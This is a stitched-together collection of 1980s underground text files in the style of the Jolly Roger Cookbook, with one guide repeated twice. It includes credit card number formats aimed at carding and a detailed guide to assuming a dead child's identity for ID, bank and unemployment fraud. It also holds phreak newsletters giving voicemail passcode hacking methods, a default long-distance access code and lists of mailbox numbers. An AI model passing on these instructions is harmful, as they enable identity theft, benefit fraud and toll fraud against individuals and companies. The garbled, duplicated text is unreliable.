Explanation:The first date is the date the person got the card, the seconddate is the expriation date, after the expiration date is the samedigits in the first year.The American Express Gold has many morenumbers (I think 6 8 then 8). If you do find a Gold card keep itfor it has a $5000.00 backup even when the guy has no money!
[Sample: Master Card] 5XXX XXXX XXXX XXXX XXXX AAA DD-MM-YY MM/YY John Doe.
Explanation:The format varies, I have never seen a card that did not start witha 5XXX there is another 4 digits on the next line that is sometimesasked for when ordering stuff, (and rarely a 3 digit letter combo(e. ANB). The first date is the date the person got the cardand the second date is the expiration date.Master Card is almost always accepted at stores.[Sample: VISA]
XXXX XXX(X) XXX(X) XXX(X) MM/YY MM/YY*VISA John Doe
Explanation:Visa is the most straight forwardof the cards,for it has the name right on the card itself, again thefirst date is the date he got the card and the second is theexpiration date. (Sometimes the first date is left out). Thenumbers can eather be 4 3 3 3 or 4 4 4 4. Visa is also almost alwaysaccepted at stores, therefore, the best of cards to use.How To Create A New Indentity By The Walking Glitch Courtesy of the Jolly Roger!
You might be saying, "Hey Glitch, what do I need a new identity for?"The answer is simple. You might want to go buy liquor somewhere, right?You might want to go give the cops the false name when you get bustedso you keep your good name, eh? You might even want to use the newidentity for getting a P.O. Box for carding. Sure! You might evenwant the stuff for renting yourself a VCR at some dickless loser of aconvenience store. Here we go:Getting a new ID isn't always easy, no one said it would be. By followingthese steps, any bozo can become a new bozo in a coupla weeks.
STEP 1
The first step is to find out who exactly you'll become. Themost secure way is to use someone's ID who doesn't use it themselves.The people who fit that bill the best are dead. As an added bonus theydon't go complaining one bit. Go to the library and lookthrough old death notices. You have to find someone who was born aboutthe same time as you were, or better yet, a year or two olderso you can buy booze, etc. You should go back as far as you can for thedeath because most states now cross index deaths to births so peoplecan't do this in the future. The cutoff date in Wisconsin is 1979, folksin this grand state gotta look in 1978 or earlier. Anything earier thereis cool. Now, this is the hardest part if you're younger. Brats thatyoung happen to be quite resilient, takin' falls out of three story windowsand eating rat poison like its Easter candy, and not a scratch ordent. There ain't many that die, so ya gotta look your ass off. Godown to the library and look up all the death notices you can,if it's on microfilm so much the better. You might have to go throughmonths of death notices though, but the results are well worth it.You gotta get someone who died locally in most instances: the deathcertificate is filed only in the county of death. Now you go down tothe county courthouse in the county where he died and get thedeath certificate, this will cost you around $3-$5 depending on the stateyou're in. Look at this hunk of paper, it could be your way tovanish in a clould of smoke when the right time comes, like right afterthat big scam. If You're lucky, the slobs parents signed him up withsocial security when he was a snot nosed brat. That'll be another pieceof ID you can get. If not, thats ok too. It'll be listed on the deathcertificate if he has one. If you're lucky, the stiff was bornlocally and you can get his birth certificate right away.
STEP 2
Now check the place of birth on the death certificate, if it's in
the same place you standing now you're all set. If not, you can mailaway for one from that county but its a minor pain and it mighttake a while to get, the librarian at the desk has listings of whereto write for this stuff and exactly how much it costs. Get the Birthcirtificate, its worth the extra money to get it certifiedbecause thats the only way some people will accept it for ID. When yurgettin this stuff the little forms ask for the reason you want it,instead of writing in "Fuck you", try putting in the word "Geneology".They get this all the time. If the Death certificate looks good foryou, wait a day or so before getting the certified birth certificatein case they recognize someone wanting it for a dead guy.
STEP 3
Now your cookin! You got your start and the next part's easy.Crank out your old Dot matrix printer and run off some mailing labelsaddressed to you at some phony address. Take the time to check yourphony address that there is such a place. Hotels that rent by the monthor large apartment buildings are good, be sure to get the right zipcode for the area. These are things that the cops might notice thatwill trip you up. Grab some old junk mail and paste your new lableson them. Now take them along with the birth certificate down to thelibrary.Get a new library card. If they ask you if you had one before say thatyou really aren't sure because your family moved around alot whenyou were a kid. Most libraries will allow you to use letters as a formof ID when you get your card. If they want more give them a sob storyabout how you were mugged and got your wallet stolen with all youridentification. Your card should be waiting for you in about two weeks.Most libraries ask for two forms of ID, one can be your trusty BirthCertificate, and they do allow letters addressed to you as a secondform.
STEP 4
Now you got a start, it isn't perfect yet, so let's continue. You shouldhave two forms of ID now. Throw away the old letters, or better yetstuff them inside the wallet you intend to use with this stuff.Go to the county courthouse and show them what nice ID you got and geta state ID card. Now you got a picture ID. This will take about two weeksand cost about $5, its well worth it.
STEP 5
If the death certificate had a social security number on it you can goout and buy one of those metal SS# cards that they sell.If it didn't, then you got all kinds of pretty ID that shows exactlywho you are. If you don't yet have an SS#, Go down and apply for one,these are free but they could take five or six weeks to get,Bureaucrats you know... You can invent a SS# too if ya like, but the mottoof 'THE WALKING GLITCH' has always been "Why not excellence?".
STEP 6
If you want to go whole hog you can now get a bank account in your newname. If you plan to do alot of traveling then you can put alotof money in the account and then say you lost the account book. Afteryou get the new book you take out all the cash. They'll hit you
with a slight charge and maybe tie-up your money some, but if you'reever broke in some small town that bank book will keep you from beingthrown in jail as a vagrant.
ALL DONE?
So kiddies, you got ID for buying booze, but what else? In some towns(the larger the more likely) the cops if they catch you for somethingpetty like shoplifting stuff under a certain dollar amount, will justgive you a ticket, same thing for pissing in the street. Thats it!No fingerprints or nothing, just pay the fine (almost always over $100)or appear in court. Of course they run a radio check on your ID, you'llbe clean and your alter-ego gets a blot on his record.Your free and clear. Thats worth the price of the trouble you've gonethrough right there. If your smart, you'll toss that ID away if thishappens, or better yet, tear off your picture and give the ID to someoneyou don't like, maybe they'll get busted with it.If you're a working stiff, here's a way to stretch your dollar. Go to workfor as long as it takes to get unemployment and then get yourself fired.Go to work under the other name while your getting the unemployment.With a couple of sets of ID, you can live like a king. These conceptsfor survival in the new age come to you compliments of THE WALKING GLITCH.First release of this phile 7/7/88.
brought to you in the Cookbook courtesy of... ---------------The Jolly Roger

How To Create A New Indentity By The Walking Glitch
Courtesy of the Jolly Roger!
You might be saying, "Hey Glitch, what do I need a new identity for?"The answer is simple. You might want to go buy liquor somewhere, right?You might want to go give the cops the false name when you get busted so you keep your good name, eh? You might even want to use the new identity for getting a P.O. Box for carding. Sure! You might even want the stuff for renting yourself a VCR at some dickless loser of a convenience store. Here we go:
Getting a new ID isn't always easy, no one said it would be. By following these steps, any bozo can become a new bozo in a coupla weeks.
STEP 1
The first step is to find out who exactly you'll become. The most secure way is to use someone's ID who doesn't use it themselves. The people who fit that bill the best are dead. As an added bonus they don't go complaining one bit. Go to the library and look through old death notices. You have to find someone who was born about the same time as you were, or better yet, a year or two older so you can buy booze, etc. You should go back as far as you can for the death because most states now cross index deaths to births so people can't do this in the future. The cutoff date in Wisconsin is 1979, folks in this grand state gotta look in 1978 or earlier. Anything earier there is cool. Now, this is the hardest part if you're younger. Brats that young happen to be quite resilient, takin' falls out of three story windows and eating rat poison like its Easter candy, and not a scratch or dent. There ain't many that die, so ya gotta look your ass off. Go down to the library and look up all the death notices you can, if it's on microfilm so much the better. You might have to go through months of death notices though, but the results are well worth it.You gotta get someone who died locally in most instances: the death certificate is filed only in the county of death. Now you go down to the county courthouse in the county where he died and get the death certificate, this will cost you around $3-$5 depending on the state you're in. Look at this hunk of paper, it could be your way to vanish in a clould of smoke when the right time comes, like right after that big scam. If You're lucky, the slobs parents signed him up with social security when he was a snot nosed brat. That'll be another piece of ID you can get. If not, thats ok too. It'll be listed on the death certificate if he has one. If you're lucky, the stiff was born locally and you can get his birth certificate right away.
STEP 2
Now check the place of birth on the death certificate, if it's in the same place you standing now you're all set. If not, you can mail away for one from that county but its a minor pain and it might take a while to get, the librarian at the desk has listings of where to write for this stuff and exactly how much it costs. Get the Birth cirtificate, its worth the extra money to get it certified because thats the only way some people will accept it for ID. When yur getting this stuff the little forms ask for the reason you want it, instead of writing in "Fuck you", try putting in the word "Geneology". They get this all the time. If the Death certificate looks good for you, wait a day or so before getting the certified birth certificate in case they recognize someone wanting it for a dead guy.
STEP 3
Now your cookin! You got your start and the next part's easy. Crank out your old Dot matrix printer and run off some mailing labels addressed to you at some phony address. Take the time to check your phony address that there is such a place. Hotels that rent by the month or large apartment buildings are good, be sure to get the right zip code for the area. These are things that the cops might notice that will trip you up. Grab some old junk mail and paste your new lables on them. Now take them along with the birth certificate down to the library. Get a new library card. If they ask you if you had one before say that you really aren't sure because your family moved around alot when you were a kid. Most libraries will allow you to use letters as a form of ID when you get your card. If they want more give them a sob story about how you were mugged and got your wallet stolen with all your identification. Your card should be waiting for you in about two weeks. Most libraries ask for two forms of ID, one can be your trusty Birth Certificate, and they do allow letters addressed to you as a second form.
STEP 4
Now you got a start, it isn't perfect yet, so let's continue. You should have two forms of ID now. Throw away the old letters, or better yet stuff them inside the wallet you intend to use with this stuff. Go to the county courthouse and show them what nice ID you got and get a state ID card. Now you got a picture ID. This will take about two weeks and cost about $5, its well worth it.
STEP 5
If the death certificate had a social security number on it you can go out and buy one of those metal SS# cards that they sell. If it didn't, then you got all kinds of pretty ID that shows exactly who you are. If you don't yet have an SS#, Go down and apply for one, these are free but they could take five or six weeks to get, bureaucrats you know... You can invent a SS# too if ya like, but the motto of 'THE WALKING GLITCH' has always been "Why not excellence?".
STEP 6
If you want to go whole hog you can now get a bank account in your new name. If you plan to do alot of traveling then you can put alot of money in the account and then say you lost the account book. After you get the new book you take out all the cash. They'll hit you with a slight charge and maybe tie-up your money some, but if you're ever broke in some small town that bank book will keep you from being thrown in jail as a vagrant.
ALL DONE?
So kiddies, you got ID for buying booze, but what else? In some towns (the larger the more likely) the cops if they catch you for something petty like shoplifting stuff under a certain dollar amount, will just give you a ticket, same thing for pissing in the street. Thats it! No fingerprints or nothing, just pay the fine (almost always over $100) or appear in court. Of course they run a radio check on your ID, you'll be clean and your alter-ego gets a blot on his record. Your free and clear. Thats worth the price of the trouble you've gone through right there. If your smart, you'll toss that ID away if this happens, or better yet, tear off your picture and give the ID to someone you don't like, maybe they'll get busted with it. If you're a working stiff, here's a way to stretch your dollar. Go to work for as long as it takes to get unemployment and then get yourself fired. Go to work under the other name while your getting the unemployment. With a couple of sets of ID, you can live like a king. These concepts for survival in the new age come to you compliments of THE WALKING GLITCH.
First release of this phile 7/7/88.
brought to you in the Cookbook IV courtesy of...
--------------Exodus-------------

########################################################################### ## The Remote Informer ## ##------------------------------------------------------------------------## ## Editors: Tracker, Norman Bates, and Ye Cap'n ## ##========================================================================## September 26, 1987 Issue: 02 ##========================================================================############################################################################ ## Brought to you by the 'new' TUFF: The Underground Fone Federation ## ###########################################################################========================================================================== The News========================================================================== Sprint Strikes Back Celestial Elite/TUFF Come to an End========================================================================= Sprint caught a guy dealing Celestial Elite and TUFF, the famouscodes on the street in LAhack/phreak groups came to an end a couplethis past week. Informationweeks ago. TUFF, however, is being rebornon this bust is limited atand you can expect it to be back to fullthis time. force within a month. Sources have it that A seventeen year old wasMagnus Adept, head of the now terminatedbusted in Arizona last week.group, Celestial Elite, has started a newThe name of the teenager willgroup called Avalon Kingdom. We are unsurenot be printed to protect himwhat plans are in store for it.
from harassment calls. TUFF has several ideas and plans that will be out to the public soon. Look for>This information was suppliedfuture issues of The Remote Informer (tm) by Phreaky Phone II for new updates.
========================================================================== Beige Box Bust TeleNet Hacker Bate's Motel Moves======================================================================== One of our editors and a Crusader released Bate's Motel BBS,member of TUFF, Norman Bateshis TeleNet hackingrun by Norman Bates,was caught for Beige boxingprogram on Septemberwas forced to move. Itthat he had done over 3 months20, 1987. Look foris temporarily set upago. The calls he had madeit on a good boardat (619)267-8619. Itwere inside his state and costyou call. A reviewwill remain 1200 baud,a total of $12. He paid thewill be in the nextand a member of thebill and no charges were filedissue of The Remote TUFF Network. It isagainst him. Informer. open to the public.========================================================================== Phreaky Phones Return: Amazing? LDDS Buys Out TMC: Companies Merge========================================================================= The original Phreaky Phone numbers LDDS bought out TMC last month.now support the new Phreaky Phones.They merged into LDDS, since it wasThe guys running them had protestedbigger and more widespread. Anythat the lines were being monitored.companies that were subscribing toThere is no way that could have been,the TMC long distance service wereand they contradicted themselves byautomatically coverted to LDDS. Allrestarting Phreaky Phones on the samelocal TMC ports still work, but willnumbers. They gave alot of creditsoon be disconnected. Refer to theto the people calling to suggest theyarticle on LDDS in this issue forbelieve a story like that. more information on LDDS dial-ups.========================================================================== US Sprint Calls Destinations Pirate's Hollow Is Back With 10 Megs========================================================================== US Sprint now calls all the Pirate's Hollow is back on-line. Itnumbers called with unauthorizednow is run a 10 meg hard drive. Unlikecodes. Their dis-advantage ismost boards that have #'s of megs, thisthat they are delayed by aboutone will stress more attention on it'stwo months in calling becausedatabase. The database is scheduled tothey have to wait till peoplebe online by October 1st. This databasereport they did not make calls towill contain 800+ text files on variousthe numbers they were billed for.topics, with about 60% - 70% pertainingBest advice is to not call voiceto illegal activities. Unfortunately,with Sprint except to those whoTrax Xe is being redesigned, so until ithave private lines other thanis finished, it will run on Carina. Thetheir regular phone line. number is (415)593-6784 (300/1200 baud).========================================================================== Raggers and Braggers========================================================================== This section is to make you aware of well-known raggers and braggers.Since this is the first time this section is being printed, we will tellyou what classifies people as raggers and braggers. In the future issuesthe top raggers and braggers will be listed in this newsletter to let theSysOps know who not to let on their board, or to atleast keep an eye on. A ragger is someone who will put someone else down for something. Theperson might post a message asking a novice question about hacking andphreaking, or may say something that is completely wrong, and a raggerwill put the other person down for he said, posted, etc. The ones thatusually classify in this category are the ones that think they know it all
and consider themselves right no matter what anyone says. Most of theusers that use codes and consider themselves a master phreaker usuallybecome raggers. A bragger is someone who either does or thinks he does know everything,and puts it upon himself to tell the whole world that he knows it all.This person is also one who thinks he is better than everyone else andhe believes he is Elite, and no one else is. People who tend to do thisare those who have, for some reason, become well-known in the underworld,and as a result become a bragger. Those usually not too well-known willnot tend to brag as much as those who think everyone would love to betheir friend and be like them. As a well-known ragger and bragger, The Toad, learned that it does nothelp to be one or both of those. He has since changed and is now easilyaccepted by most. Most people disliked him because others they knew hadsaid something bad about him. This is called peer pressure and is a badinfluence to those who are new to the underworld. I would suggest in thefuture, to not judge someone by what others say, but rather by how theyact around/to you. The current most popular Atarian that classifies as a ragger and abragger is Ace of Aces, and is well-hated by many users and SysOps, sincehe tends to put down anything anyone says and considers himself the bestat writing hacking programs. He is commonly referred to as Ass of Assesand Ass of Assholes. Even holding an open mind about this guy, you wouldsoon come to find that what others said coincides with what you see fromhim.========================================================================== A New 950 has arrived!========================================================================== LDDS, who as mentioned above bought out TMC, is installing a new 950port to most major cities. By the time you read this, it should be inalmost every area that supports 950 ports. The number is 950-1450. Thisport will dial 976 numbers, but not 700, 800, or 900 numbers. The dialingmethod for LDDS is: 7 digit code, then even if the code is bad it willgive you a dial tone. Then dial the area code plus the number. If youhave a bad code it will simply say your call cannot be completed as it wasdialed. There is a default code used on the system that currently works.The code is simply, 1234567. I have seen codes from 5 different companiesand they all are in the format of 00xxxxx. I do not know what type ofsoftware they use, but I will know by the next issue exactly what theyplace on the bills. This could be the answer to alot of people'sproblems with fear of Sprint and ITT, especially AllNets. Just remember,Tracker is the one who found this, and all information about it. Ifsomeone is seen saying they found this, then they will be listed in thenext issue which will contain an article on leeches.========================================================================== Mailbox Systems========================================================================== Mailbox systems are the link between information and the underworld. Ifyou have ever called one, then you will know the advantages of having one,especially the ones that are open to whole underworld, rather than just aselect few. There are two types of mailbox systems that are widely used. The first type we will talk about is the multiple mailbox systems, orcommonly referred to as message systems. These systems have severalmailboxes set up on one number. Usually, you can access other mailboxesfrom that number by pressing '*' or '#'. Sometimes you just enter themailbox number and you are connected. These are the safest systems to useto protect information from US Sprint and other long distance companies.Since US Sprint and other companies call the destination numbers, it is
safer to have 800 mailbox systems, and most of the time, the multiplemailbox systems are on 800 numbers. The passcode on these systems canvary in length and can be accessed by several different methods, so it isimpossible to explain exactly how to hack these systems. The other type is the single mailbox system. These are usually set upin a reserved prefix in an area code. (Ex: 713-684-6xxx) These systemsare usually controlled by the same type of hardware/software. To accessthe area where you enter the passcode, just hit '0' for a second or so.The passcodes are four (4) digits long. The only way to hack these ismanually. The best thing you could do is to find one that does not havea recording from a person, but just the digitized voice. If you hack onethat someone already owns, they will report it and it will not last aslong. Here is a list mailboxes or prefixes to help you get started-------------------------------------------------------------------------- Single Multiple Digits------------ ------------ --------213-281-8xxx 212-714-2770 3213-285-8xxx 216-586-5000 4213-515-2xxx 415-338-7000 Aspen Message System 3214-733-5xxx 714-474-2033 Western Digital214-855-6xxx 800-222-0651 Vincent and Elkins 4214-978-2xxx 800-233-8488 3215-949-2xxx 800-447-8477 Fairylink 7312-450-8xxx 800-521-5344 3313-768-1xxx 800-524-2133 RCA 4405-557-8xxx 800-527-0027 TTE TeleMessager 6602-230-4xxx 800-632-7777 Asynk 6619-492-8xxx 800-645-7778 SoftCell Computers 4713-684-6xxx 800-648-9675 Zoykon 4 800-847-0003 Communications World 3========================================================================== The Disclaimer!========================================================================== We, the editors, take no responsibility for your actions and use ofthe information in this newsletter. This newsletter is for informationalpurposes only. If you are easily offended by telecommunicationdiscussions, then we suggest that you not read this newsletter. But forthose who are truely interested in the information in this newsletter,enjoy it.========================================================================== Coming in the next issue!========================================================================== In the next issue, we will be open for suggestions from the readersof this issue. We will have some featured articles though, which include:1) Study of bridges2) Review of Crusader's new TeleNet Hacker3) More information on the new LDDS 950 port4) Review of Code Hackers for all modems5) List of TeleNet addresses6) Credit Card checkers7) Ideas from the readers==========================================================================
Brought to you in the Cookbook by the Jolly Roger!!!!!!!!!!!!!!!
###########################################################################¼###
# _________________________________## /he Remote Informer Newsletter!####--------------------------------------------------------------------------¼--## November TRI Issue:03 ##--------------------------------------------------------------------------¼--#### The Editors: Tracker, Ye Cap'n, Norman Bates, and The Reporter##############################################################################¼###===========================================================================¼==== Introduction============================================================================¼===It's been a month now, and ALOT has happened. So much, in fact, that theinformation will be split into several issues. This should be no shocksinceI mentioned in the first issue that we may put several issues outsometimes. I want to congratulate the readers for finally contributing to thenewsletter. This first two issues were all on information that I, myself,obtained. Several people gave me information for these issues, and theirhandle and information is included in the articles.===========================================================================¼==== In The News!============================================================================¼=== ITT has 9 digits! Phreaky Phones Go Down!Information!===========================================================================¼=== For those of you who did The famed Phreaky Phones are down Wehavenot know this, ITT has nineagain. Modem Man, the original personso muchinfodigit codes. They are saidthat started them, has said that theyto putout,to give better connectionswill be down until further notice. Inthat weareto some extent. This info.the meantime, other independent boxesputtingoutwas originally given to usare being started. A listing can bemanyissuesby Party Beast. made of current ones on request. at one
time.=================================================================If youwant Magnus Adept Gets Busted Sprint Codes Are Dying Fast! allissues=================================================================that areout Fellow Atarian and well- Sprint codes are hard to get andnow,thenknown phreak Magnus Adeptwhen they are obtained, they tend tocall oneofgot caught by MCI. Detailsdie rather quickly. Phreakers havetheboardsof the how, when, and wherebeen saying that the 950-0777 portat theendare not known at this time.is dead, but on the contrary, it isof theissueHe got caught with 150 codesstill available in states that areor lookforand may have to pay up tonot highly abused by phreaks. Herean editoron50 dollars for each code.again, rumors are being spread. a hackBBS.===========================================================================¼==== The Best BBS of the Month============================================================================¼=== Starting from now on, we will have a BBS of the month. We will chooseaBBS, ragardless of computer type, and look at the user participation inphreakrelated matters, as well as quality discussions on the various illegaltopics.A BBS can remain the BBS of the month as long as they reside above the restofthe BBS systems. Even though we will sometimes bring out more than oneissuein a month, the board will remain BBS of the month until the first issueinthenext month comes out. This month's BBS of the month is FBI PirateNet. We chose this boardbecause of the large numbers of posts in the bases, and not onlyinformation,but discussions as well, with a minimum number of posts from raggers andbraggers. The number for it is 516-661-7360. The SysOp of FBI PirateNetisThe Phantom, not to be confused with an earlier narc.===========================================================================¼==== US Sprint Expected to Trim Staff, Consolidate Divisions============================================================================¼=== New York -- US Sprint Communications Corp., the troubled long distancecarrier, is expected to announce soon that it will cut its work force byseveral hundred people and reduce its seven regional divisions to 3
operatinggroups, sources familiar with the company said. The company's Pacific division is based in Burlingame, CA. Thelayoffsand reorganization are part of a plan by US Sprint's new president, RobertH.Snedaker, to reduce heavy operating losses, which analysts expect to reachmore than $800 million this year. Snedaker replaced Charles M. Slibo, who was forced to resign in Julybecause losses were running much higher than the parent companies hadexpected. Problems with the company's computerized billing system alsocontributed to Skibo's ouster. US Sprint is owned and operated by the GTECorp. and United TeleCom. According to sources close to Snedaker, who was vice chairman andchiefoperating officer of United TeleCom, he is planning to consolidate thecompany's 7 divisions, which operate in the same geographical regions astheseven regional Bell operating companies, into 3 divisions. The rationale for the move, according to idustry analysts, is that thecompany will need a much smaller work force once it begins handling allit'sphone traffic on it's new fiber optic network, which can carry a greaternumber of telephone calls at less cost. Company officials have said thatthey expect to have most of the traffic on the network by early next year. One source said that there would be more than one round of layoffs inthecoming months and that the company ultimately plans to reduce its 14,000member work force by 15 percent. Several top managers are expected to resign as soon as US Sprintcentralizes its marketing and support operations as its headquarters inKansasCity, MO., according to a report in the latest issue of Business Weekmagazine. A spokesman for US Sprint said on Friday that the company would notcomment on the rumors. The company is the nation's third largest longdistance company, after the American Telephone and Telegraph Co. (AT&T) andMCI Communications Co. Last year, Washington based MCI undertook a similar reorganization inwhich it posted a $502.5 million loss to write down old inventory andrestructure operations. Analysts said that is US Sprint is to turn a profit, the company mustincrease its market share. "To do this, US Sprint must gain more largebusiness customers, which account for about 80 percent of industryrevenues,"said Robert B. Morris III, Securities in San Francisco. Morris said that by using a slick marketing campaign to differentiateitsall-fiber telephone network from those of competitors, US Sprint more thandoubled its customer base last year. But "most of these customers wereresidential and small business users that added little to Sprint's bottomline," he added. "If the company expects to be profitable, it will have toconcentrate on providing the best service to volume users."] This information was supplied by Ye Cap'n===========================================================================¼==== Secret Service Cracks Down on Teen Hackers=
===========================================================================¼=== Mount Lebanon, PA -- The US Secret Service and local policedepartmentshave put a scare into the hacker community with a nationwide crackdown oncomputer crime that has resulted in the arrests of teenage hackers in atleastthree cities. "People who monitor the bulletin boards say there are a lot of nervoushackers out there, wondering who will be arrested next," says Ronald E.Freedman, vice-president of Advanced Information Management, a Woodbridge,VAbase computer security firm. Nine teenagers from Mount Lebanon Junior-Senior High School nearPittsburg, PA, were arrested recently and charged with computer fraud. Thejuveniles allegedly used home computers to gain illegal access to a creditcard authorization center. They obtained valid credit card numbers andusedthem to purchase thousands of dollars worth of mail order merchandise, thepolice said. Freedman says it appears the hackers used some relativelysophisticatedtechniques in the scheme, including specially written software that enabledthem to bypass security controls and navigate through credit records toobtainkey information. Police officials say that the hackers also obtained access codes frompirate bulletin board systems to make free long distance calls and gainaccessto various business and government computers. The arrests were the result of a 6 week investigation by the SecretService and the Mount Lebanon police. The police were tipped off by parentswho were suspicious about how their son managed to obtain a skateboardvaluedat $140. The Secret Service was also involved in investigations that led to thearrests of several hackers in San Francisco and New York last July. Secret Service spokesman William Corbett says that although somereportshave portrayed the hackers as part of a national crime ring, the cases areunrelated. "It's just that a few of these computers hacking cases came toahead at about the same time," he says. Federal Legislation enacted in 1984 gives the Secret Service, part oftheDepartment of the Treasury, a major role in investigating computer crimes.Under the federal Computer Fraud and Abuse Act of 1986, computer fraud is afelony that carries a maximum penalty of 5 years for the first offense, and10years for the second. Displaying unauthorized passwords on hackingbulletinboards carries a maximum penalty of 1 year in prison for the first offense,and 10 years for the second.] This information was supplied by Ye Cap'n===========================================================================¼==== German Teens Crack NASA=
===========================================================================¼=== Washington, D.C. -- A group of West German teenagers from the ChaosComputer Club penetrated a NASA network recently, saying they were doing itto"test the security." What they got into was SPAN Net, a computer network with about 700notes,which is actually based at the Goddard Space Center in Maryland. Allthat'sin there is unclassified data, space science information, and post-flightdataanaysis. "Anyone with NASA related research can apply for access to SPAN"says a spokesman, who adds that the network runs on DEC VAX hardware. "Wepicked up three attempts to gain access and put in security precautions soitwould't happen." His personal opinion is, "We're happy that they couldn'tgetback in, and decided to go public." He also added that NASA has many othernetworks, many of the classified and "probably inpenetrable. But I do notwant to challenge anybody." How'd they get in? Probably they got a West German NASA licensee,whichgave them a visitor's pass, then they created new passwords with unlimitedsecurity for themselves, after which getting around the network was easy.] Supplied by Ye Cap'n===========================================================================¼=== We look for information in anyway related to the newsletter. If youhavesomething of interests, or something that you saw on television, or in thenewspaper, then upload it to one of the boards listed below. You willreceivefull credit.Pirate'sHollow..................................................(415)593-6784Bate'sMotel.....................................................(619)267-0293===========================================================================¼===
###########################################################################¼#### _________________________________## /he Remote Informer Newsletter!####--------------------------------------------------------------------------¼--## November TRI Issue:04 ##--------------------------------------------------------------------------¼--###
# The Editors: Tracker, Ye Cap'n, Norman Bates and The Reporter##############################################################################¼###===========================================================================¼==== FCC Charges Much Ado About Not Much============================================================================¼=== New Cannan, CT -- International Resource Develope of New Cannan, CTsaysthat the market bubble for packet switch networks like TeleNet is going toburst by 1991, regardless of what the Federal Communications Commissiondoesabout access charges. Cheap fiber, which greatly increases the capacity,andISDN services, which let you share a phone line with your computer, will dothe business in, the report says. Over the next four years, however, thedemand for packet switch services to will grow from $650 million to $1,612million (If the Baby Bells are allowed to add competition to the market,the$5/hour access charge cannot be passed though to the customers anyway).] Supplied by Ye Cap'n===========================================================================¼==== Pirate's Hollow Update============================================================================¼=== San Carlos, CA -- The Pirate's Hollow, one of the more popular BBS'sinthe Bay Area, is installing several new features that will even add to it'spopularity. For one, users will be able to gamble against each other bybetting on NFL games and participating in the Pirate's Hollow Lottery.Also,in order to support one of the best newsletters around, the Pirate's Hollowwill soon be adding a seperate module that will act as an outpost for TheRemote Informer. This module will feature the older issues of thenewsletter,a section that will keep you abreast of updates of recently releasedinformation, and a section that will show what is upcoming in the nextissuesof The Remote Informer. The long-awaited database will soon be put online. Over 800 textfileson a variety of subjects will be available to the users that pay the accessfee that will be determined at a later date. Many more are on the way, andwill be included at no charge. The charge will be a one time charge though,rather than a yearly payment. Another new option will be available by early December. PC Pursuitcallback will be installed. This will allow people to call and then getcalled back if your area code is supported by PC Pursuit. This will alsorequire a charge, to be set at a later date. The Pirate's Hollow has been doing well in its comeback to thetelecommunications world, but we need more callers in order to formulate amore diverse user base. Please spread the BBS # around while also trying
tomake others aware of the newsletter.===========================================================================¼==== Switching Systems============================================================================¼=== There are currently three different forms of switching systems thatarepresent in the United States today. Step by Step (SxS), Crossbar, and theElectronic Switching System (ESS) make up the group. Phreaks have alwaysbeena little tenative when it comes to "doing their work" once they have heardabout effects of switching systems on their hobby. After researching thistopic, I have found that there really is not that much to be worried about.Read on, while I share with you information which I have compiled about allofthese switching systems and their distinct features. The first switching system that was used in the country was calledStepby Step. This was adopted in 1918 by Bell, and until 1978, they had over53%of all their exchanges using Step by Step (SxS). This system is known forit's long, confusing train of switches that are used for its step by stepswitching. Step by Step has many disadvantages to phone users. The switch trainbecomes jammed fairly often, and it causes calls to be blocked. Also, SxSdoes not allow the use of DTMF dialing. This accounts for some of the areasinthe United States that cannot have touch tone dialing abilities. Atremendousamount of electricity and maintenance needs to accompany the SxS switchingsystem, which makes it even more impratical. All in all, this is probablythemost archaic switching system around. There are a number of ways to see if you are on SxS. You will noticethatthere are no pulsing digits after dialing. Most sources say that the phonecompany will sound like many typewriters. SxS does not offer features suchasspeed calling, call forwarding, three-way calling, call waiting, and othersuch services. Pay phones on SxS also will want your money before youreceivea dial tone. This adds to the list of disadvantages labelled to that oftheStep by Step switching systems. Another type of switching system that is prevalent in the UnitedStatesis Crossbar. Crossbar has been Bell's primary switcher after 1960, andthreetypes of it exists. Number 1 Crossbar (1xB), Number 4 Crossbar (4xB), andtheNumber 5 Crossbar (5xB). In Crossbar, a switching matrix is used for allthephones in an area, and when someone calls, the route is determined and ismetup with the other phone. This matrix is set-up in horizontal and vertical
paths. Unlike other swichting systems, in my research, I could not come upwith any true and definate distinguishing features of the Crossbarswitchingsystems. The Electronic Switching System (ESS) is yet another switching systemused in the United States and the most used of all three swicthing systems.ESS is an extremely advanced and multi-faced type of switching system, andisfeared by marauders of the phone company everywhere. With ESS, your phonecompany is able to know every digit dialed (including mistakes), who youcall,when you called, and how long you were connected. ESS is also programmedtoprint out the numbers of people who make excessive calls to WATS numbers(800services) or directory assistance. This feature of ESS is called 800Exceptional Calling Report, and has spelled the end of some forms ofcontinuous code hacks to certain extenders. ESS can also be programmed toprint logs of who called and abused certain numbers as well. Everything iskept track of in its records. The aforementioned facts show that ESS has made the jobs oforganizationssuch as the FBI, NSA, and other phone company security forces easier.Tracingcan be done in a matter of microseconds, and the result will beconvenientlyprinted out on the monitor of a phone company officer. ESS is alsoprogrammedto pick up any "foreign tones" on the phone line such as the many variedtonesemulated by boxes. ESS can be identified by a few features common in it. The 911emergencyservice is covered in the later versions of ESS. Also, you are given thedialtone first when using a pay phone unlike that of SxS. Calling serviceslikecall forwarding, speed calling, and call waiting are also common to ESS.Oneother feature common to ESS is ANI (Automatic Number Identification) forlongdistance calls. As you can see, ESS is basically the zenith of allswitchingsystems, and it will probably plague the entire country by the early1990's.Soon after, we should be looking forward to a system called CLASS. Thisswitching system will contain the feature of having the number of thepersonthat is calling you printed out on your phone. What have I concluded about these switching systems? Well, they arenotgood enough. I know a few people employed by the phone company, and I knowfor a fact that they do not have enough time these days to worry about codeusers, especially in large, metropolitan areas. So, I will go out on alimbhere, and say that a large portion of people will never have to worry aboutthe horrors of ESS.] Written by Ye Cap'n
===========================================================================¼==== New Gizmo Can Change Voice Gender============================================================================¼=== The most amazing device has turned up in the new Hammacher Schlemmercatalog: the telephone voice gender changer. What it does is change the pitch of your voice from, say, soprano tobass-- a most efficient way to dissuade an obscene phone caller just as he'sgetting warmed up. That is not the same as running a 45 r.p.m. record at 33. In digitalconversion, the pitch can be changed without altering the speed. The device runs on a 9-volt batter and attaches to the telephone mouthpiece with a rubber coupler that takes but a moment to slip on and off. With the changer switched on, says Lloyd Gray, a Hammacher Schlemmertechnical expert, "the effect is similar to what you hear when theyinterviewan anonymous woman on television and disguise her voice by deepening it.""It's better for changing a woman's voice to a man's than the other wayaround," Gray said. A man can use it to raise the pitch of his voice, buthestill won't sound like a woman." A man could, however, use the changer to disguise his voice. But withthedevice set on high, Gray's voice still could be identified as his own. Onlow,his normal tenor became so gravel like that the words were unintelligible.] Supplied by Tracker and The Reporter===========================================================================¼===
